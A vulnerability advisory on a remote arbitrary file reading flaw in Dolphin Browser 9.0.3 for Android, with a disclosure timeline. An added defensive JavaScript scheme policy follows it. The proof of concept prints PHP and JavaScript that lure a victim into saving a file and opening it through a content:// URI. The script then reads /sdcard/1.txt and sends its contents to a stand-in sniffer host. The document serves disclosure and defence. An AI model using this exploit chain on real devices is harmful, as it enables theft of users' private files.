PT-2012-60: Arbitrary File Reading in Dolphin Browser

Vulnerable software

Dolphin Browser
Version: 9.0.3 and earlier
Application link: http://dolphin-browser.com/

Severity level

Severity level: Medium
Impact: Arbitrary File Reading
Access Vector: Remote
CVSS v2:
Base Score: 5.8
Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:P)
CVE: not assigned

Software description

Dolphin Browser is a powerful, quick and elegant browser for Android 2.0+.

Vulnerability description

The specialists of the Positive Research center have detected a Remote Arbitrary File Reading vulnerability in Dolphin Browser.

The vulnerability exists because of incorrect processing of the content:// wrapper, which allows the available content provider to be addressed remotely. As a result, an attacker can view the contents of the /sdcard/1.txt file if the victim follows the content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt link. The attack is simple to implement.

1. A victim follows a link to a web site with the following PHP code:

    <? echo "<body onload=\"setTimeout('window.location=\'1day.php\'',1000);setTimeout('window.location=\'content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html\'',5000);\">"; ?>

2. The browser automatically loads the 1day.php page with the following code:

    <? header('Content-Disposition: attachment; filename="test.html"'); ?>
    <iframe src="content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt"></iframe>
    <script>
    window.onload = function () {
        file = document.getElementsByTagName('iframe')[0].contentWindow.document.body.innerHTML;
        img = new Image();
        img.src = 'http://oursniffer/sniff.php?data='+file;
    }
    </script>

3. Then the user presses the "Save" button, and the exploit is now located at /sdcard/download/test.html.

4. Then we forward the user to this file (content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html) via a link, and the code is executed.

5. Data from the /sdcard/1.txt file is written into the sniffer's log.

How to fix

Update your software to the latest version.

Advisory status

18.12.2012 - Vendor is notified
18.12.2012 - Vendor gets vulnerability details
05.02.2013 - Vendor releases fixed version and details
07.03.2013 - Public disclosure

Credits

The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

References

http://en.securitylab.ru/lab/PT-2012-60

Reports on the vulnerabilities previously discovered by Positive Research:
http://ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/
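
The request chain from the vulnerability description, run through a scheme policy that a browser could apply before loading a URL. This is an added example, not Dolphin Browser's code or the vendor's fix. The policy, the function names and the site.example host are assumptions made for illustration.

```javascript
// Added example: scheme policy for navigations and embeds (assumed policy,
// hypothetical function names; not taken from Dolphin Browser).
const LOCAL = new Set(['content:', 'file:']);   // device-local schemes
const WEB = new Set(['http:', 'https:']);       // remote content

// Resolve the target against the document that initiated the request.
function resolve(initiator, target) {
  try {
    const from = new URL(initiator);
    const to = new URL(target, from);   // handles relative targets like "1day.php"
    return { from, to };
  } catch (e) {
    return null;                        // unparseable input fails closed
  }
}

// kind: 'navigate' (top-level load), 'frame' (iframe), 'subresource' (img, script).
// Returns 'allow', 'block', or 'isolate' (load, but as a separate origin).
function decide(initiator, target, kind) {
  const r = resolve(initiator, target);
  if (!r) return 'block';
  const fromWeb = WEB.has(r.from.protocol);
  const toLocal = LOCAL.has(r.to.protocol);
  // Remote pages must not reach device-local schemes on their own.
  if (fromWeb && toLocal) return 'block';
  // A local document may frame another local URI, but every local URI is its
  // own origin, so the parent cannot read the framed document's DOM.
  if (!fromWeb && toLocal && kind === 'frame' && r.from.href !== r.to.href) {
    return 'isolate';
  }
  return 'allow';
}

// Constructed events that mirror the steps in the advisory.
const PROVIDER = 'content://mobi.mgeek.TunnyBrowser.htmlfileprovider';
const chain = [
  ['http://site.example/index.php', '1day.php', 'navigate'],
  ['http://site.example/index.php', PROVIDER + '/sdcard/download/test.html', 'navigate'],
  [PROVIDER + '/sdcard/download/test.html', PROVIDER + '/sdcard/1.txt', 'frame'],
];

function evaluateChain(events) {
  return events.map(([initiator, target, kind]) => decide(initiator, target, kind));
}

console.log(evaluateChain(chain));
```

Under this policy the redirect to the saved file is refused, and even if the saved file is opened by other means, the framed /sdcard/1.txt document is a separate origin whose contents the parent page cannot read.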